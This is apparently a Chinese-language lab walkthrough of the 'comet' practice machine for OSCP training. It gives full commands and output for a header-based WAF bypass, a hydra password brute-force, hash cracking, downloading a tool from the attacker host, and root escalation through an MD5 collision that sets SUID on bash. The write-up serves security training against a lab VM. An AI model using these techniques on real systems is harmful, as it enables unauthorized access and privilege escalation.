【OSCP】comet

OSCP 靶场

靶场介绍

comet

medium

waf、x-oringaing-ip绕过、bp 爆破、sha256 哈希、john 破解

信息收集

主机发现

端口扫描

┌──(root㉿kali)-[~]
└─# nmap -sV -A -p- -T4 192.168.1.104
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-07 03:36 EST
Nmap scan report for 192.168.1.104
Host is up (0.00042s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE    SERVICE VERSION
22/tcp open     ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 db:f9:46:e5:20:81:6c:ee:c7:25:08:ab:22:51:36:6c (RSA)
|   256 33:c0:95:64:29:47:23:dd:86:4e:e6:b8:07:33:67:ad (ECDSA)
|_  256 be:aa:6d:42:43:dd:7d:d4:0e:0d:74:78:c1:89:a1:36 (ED25519)
80/tcp filtered http
MAC Address: 08:00:27:2A:46:9B (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.42 ms 192.168.1.104

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.24 seconds

目录扫描

┌──(root㉿kali)-[~]
└─# gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.1.104 -x php,txt,html -e
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.1.104
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,html
[+] Expanded:                true
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://192.168.1.104/.php                 (Status: 403) [Size: 278]
http://192.168.1.104/.html                (Status: 403) [Size: 278]
http://192.168.1.104/images               (Status: 301) [Size: 315] [--> http://192.168.1.104/images/]
http://192.168.1.104/contact.html         (Status: 200) [Size: 5886]
http://192.168.1.104/blog.html            (Status: 200) [Size: 8242]
http://192.168.1.104/about.html           (Status: 200) [Size: 7024]
http://192.168.1.104/login.php            (Status: 200) [Size: 1443]
http://192.168.1.104/support.html         (Status: 200) [Size: 6329]
http://192.168.1.104/index.html           (Status: 200) [Size: 7097]
http://192.168.1.104/ip.txt               (Status: 200) [Size: 0]
http://192.168.1.104/js                   (Status: 301) [Size: 311] [--> http://192.168.1.104/js/]
http://192.168.1.104/.html                (Status: 403) [Size: 278]
http://192.168.1.104/.php                 (Status: 403) [Size: 278]
http://192.168.1.104/server-status        (Status: 403) [Size: 278]
Progress: 882240 / 882244 (100.00%)

目录扫描找到后台和两个用户名字

这里好像还有waf，加单引号发送就一直转圈了，爆破也失败

通过测试发现可以通过添加x-oringaing-ip绕过，添加后使用bp 爆破获取登录账号密码

如果bp导入字典时卡死的话，可以使用hydra进行爆破

└─# hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.1.104 http-post-form "/login.php:username=admin&password=^PASS^:H=X-ORIGINATING-IP:test:F=Invalid"
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-01-09 21:05:25
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://192.168.1.104:80/login.php:username=admin&password=^PASS^:H=X-ORIGINATING-IP:test:F=Invalid
[STATUS] 4427.00 tries/min, 4427 tries in 00:01h, 14339972 to do in 53:60h, 16 active
[80][http-post-form] host: 192.168.1.104   login: admin   password: solitario
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 0 target did not complete

使用登录账号进入后台后，里面是一些防火墙的日志文件还有一个防火墙升级程序。

firewall_update 启动后需要密码，strings 查看字符串发现存在 sha256 哈希

echo "b8728ab81a3c3391f5f63f39da72ee89f43f9a9f429bc8cfe858f8048eaad2b1" > hash256

使用 john 来破解 SHA256 哈希。

或者直接到在线网上破解

密码是对了，但是没有任务作用

下载logFire 日志文件，然后通过grep匹配找到了用户名，

wget -r http://10.0.2.35/logFire/

权限获取

ssh [email protected]

权限提升

joe用户目录下有一个coll 文件，查看sudo 可以使用root 权限运行

我们可以以 root 身份运行 /bin/bash /home/joe/coll 查看一下 coll 文件

#!/bin/bash
exec 2>/dev/null

file1=/home/joe/file1
file2=/home/joe/file2
md5_1=$(md5sum $file1 | awk '{print $1}')
md5_2=$(md5sum $file2 | awk '{print $1}')


if      [[ $(head -n 1 $file1) == "HMV" ]] &&
  [[ $(head -n 1 $file2) == "HMV" ]] &&
  [[ $md5_1 == $md5_2 ]] &&
  [[ $(diff -q $file1 $file2) ]]; then
    chmod +s /bin/bash
    exit 0
else
    exit 1
fi

该脚本检查两个文件的第一行是否以文本开头HMV，如果两个文件的哈希值MD5相同并且满足条件，则会向 bash 解释器授予提升的（s 位）执行权限。

下载md5collgen，然后创建一个文件输入HMV，计算file1的md5后，重命名msg1.bin、msg2.bin为file1和file2。最后sudo /bin/bash /home/joe/coll，然后bash 就有suid 权限了。执行bash -p 成功提权到root 权限。

joe@comet:~$ wget http://192.168.1.158:12345/md5collgen
--2024-01-10 05:33:00--  http://192.168.1.158:12345/md5collgen
Connecting to 192.168.1.158:12345... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3338360 (3.2M)
Saving to: ‘md5collgen’

md5collgen                    100%[=================================================>]   3.18M  --.-KB/s    in 0.1s

2024-01-10 05:33:00 (31.3 MB/s) - ‘md5collgen’ saved [3338360/3338360]

joe@comet:~$ echo HMV > file1
joe@comet:~$ ls
coll  file1  md5collgen  user.txt
joe@comet:~$ chmod +x md5collgen
joe@comet:~$ ls
coll  file1  md5collgen  user.txt
joe@comet:~$ ./md5collgen file1
MD5 collision generator v1.5
by Marc Stevens (http://www.win.tue.nl/hashclash/)

Using output filenames: 'msg1.bin' and 'msg2.bin'
Using prefixfile: 'file1'
Using initial value: 66fdfd128fcadfc4946a54c7a85dc86d

Generating first block: ..ls
.................................................................................................................
Generating second block: W...........................................
Running time: 122.733 s
joe@comet:~$ ls
coll  file1  md5collgen  msg1.bin  msg2.bin  user.txt
joe@comet:~$ ls
coll  file1  md5collgen  msg1.bin  msg2.bin  user.txt
joe@comet:~$ rm file1
joe@comet:~$ mv msg1.bin file1
joe@comet:~$ mv msg2.bin file2
joe@comet:~$ ls -la /bin/bash
-rwxr-xr-x 1 root root 1234376 Mar 27  2022 /bin/bash
joe@comet:~$ sudo /bin/bash /home/joe/coll
joe@comet:~$ bash -p
bash-5.1# id
uid=1000(joe) gid=1000(joe) euid=0(root) egid=0(root) groups=0(root),1000(joe)
bash-5.1# whoami
root
bash-5.1# ls
coll  file1  file2  md5collgen user.txt
bash-5.1# cd /root
bash-5.1# ls
root.txt
bash-5.1# cat root.txt
052cf26a6e7e33790391c0d869e2e40c
bash-5.1#

End

“点赞、在看与分享都是莫大的支持”

原文始发于微信公众号（贝雷帽SEC）：【OSCP】comet